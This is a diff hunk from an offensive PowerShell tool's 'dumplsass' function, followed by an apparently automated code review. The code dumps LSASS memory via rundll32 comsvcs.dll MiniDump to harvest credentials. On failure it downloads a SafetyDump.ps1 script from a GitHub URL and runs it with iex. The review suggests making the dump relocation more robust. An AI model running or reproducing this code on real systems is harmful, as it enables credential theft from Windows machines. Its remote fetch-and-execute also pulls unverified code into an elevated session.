@@ -503,13 +503,14 @@ function dumplsass
503503 $dumpid = foreach ($process in $processes ){if ($process.ProcessName -eq " lsass" ){$process.id }}
504504 Write-Host " Found lsass process with ID $dumpid - starting dump with rundll32"
505505 Write-Host " Dumpfile goes to .\Exploitation\$env: computername .dmp "
506- rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath \$env: computername.dmp full
506+ rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $dumpid $currentPath \Exploitation\ $env: computername.dmp full
507507 }
508508 catch {
509509 Write-Host " Something went wrong, using safetykatz instead"
510510 iex (new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1' )
511- Write-Host - ForegroundColor Yellow ' Dumping lsass to C:\windows\temp \debug.bin :'
511+ Write-Host - ForegroundColor Yellow ' Dumping lsass to .\Exploitation \debug.bin :'
512512 Safetydump
513+ move C:\windows\temp\debug.bin $currentPath \Exploitation\debug.bin
513514 }
514515 }
515516 else {Write-Host " No Admin rights, start again using a privileged session!" }
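Review bot: The added `move` line in the catch branch is unchecked: if Safetydump produced no file or the Exploitation folder does not exist (neither is verified in the visible lines), Move-Item only writes a non-terminating error and an LSASS dump containing credential material can stay behind in C:\windows\temp. The yellow Write-Host line also announces .\Exploitation\debug.bin before Safetydump has run, so the operator is told a location that is not yet true. I would make the move explicit and terminating, `Move-Item -LiteralPath C:\windows\temp\debug.bin -Destination (Join-Path $currentPath 'Exploitation\debug.bin') -ErrorAction Stop`, and print the final path only after it succeeds so leftover artefacts are noticed and cleaned up. Separately, the unchanged `iex ... downloadstring` line fetches SafetyDump.ps1 from the `master` branch with no pinned commit or hash check, so what runs in this elevated session can change without any change to this repository. The dumplsass function and its try block begin outside this hunk.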